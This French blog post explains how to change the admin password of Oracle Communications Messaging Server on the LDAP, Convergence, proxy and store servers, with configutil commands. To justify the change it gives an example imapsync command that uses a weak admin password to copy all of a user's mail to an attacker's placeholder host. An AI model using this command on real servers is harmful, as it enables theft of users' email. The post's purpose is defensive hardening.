Oracle Communications Messaging Server – modification du mot de passe admin

Historiquement, le compte admin de votre solution Oracle Messaging Server a pu être créé avec un mot de passe "faible" ou peu sécurisé. Il faut absolument le modifier car, en cas de compromission, il est tout à fait possible d'utiliser imapsync pour récupérer l'ensemble des courriels de vos utilisateurs (via l'option --authuser) !

Historiquement, le compte admin de votre solution Oracle Messaging Server a pu être créé avec un mot de passe « faible » ou peu sécurisé. Il faut absolument le modifier car, en cas de compromission, il est tout à fait possible d’utiliser imapsync pour récupérer l’ensemble des courriels de vos utilisateurs (via l’option –authuser) !

Exemple d’usage frauduleux

imapsync --host1 serveurimappublic.entreprise.fr \ 
--user1 uid --authuser1 admin \ 
--password1 motdepasseadmintoutpourri \ 
--host2 serveurimapdupirate.superpirate.fr \ 
--user2 user \ 
--password2 user

Où uid représente l’identifiant dont on veut aspirer tous les courriels !

LDAP

Etape la plus simple, il vous suffit de modifier le mot de passe du compte admin via Apache Directory Studio.
Le DN est uid=admin,ou=People,ou=entreprise,o=local,c=fr

Convergence

ssh srv-convergence
configutil -o local.service.proxy.adminpass -v "nouveaumotdepassesecurise"
/opt/sun/comms/messaging64/bin/stop-msg
/opt/sun/comms/messaging64/bin/start-msg

#Cette commande vous demandera votre ancien mot de passe avant de positionner le nouveau
iwcadmin -o mail.proxyadminpwd -v "nouveaumotdepassesecurise"
/etc/init.d/glassfish restart

A savoir, pour faire du ménage dans votre configuration, vous pouvez utiliser l’option -d de configutil.
Par exemple :

configutil -o local.service.http.smtpauthpassword -d

Proxy

ssh srv-mta
cd /opt/sun/comms/messaging64/bin/
./configutil -o local.service.http.smtpauthpassword -v "nouveaumotdepassesecurise"
./configutil -o local.service.proxy.adminpass -v "nouveaumotdepassesecurise"
/opt/sun/comms/messaging64/bin/stop-msg
/opt/sun/comms/messaging64/bin/start-msg

Store

ssh srv-store
configutil -o local.service.http.smtpauthpassword -v "nouveaumotdepassesecurise"
configutil -o local.service.proxy.adminpass -v "nouveaumotdepassesecurise"
configutil -o local.service.http.proxy.adminpass -v "nouveaumotdepassesecurise"
/opt/sun/comms/messaging64/bin/stop-msg
/opt/sun/comms/messaging64/bin/start-msg

Suppression des options inutiles

Sous convergence :

configutil -o local.service.http.smtpauthpassword -d

Emplacement des logs

Dans le dossier : /var/opt/sun/comms/messaging64/log2

Étiquettes

Publications similaires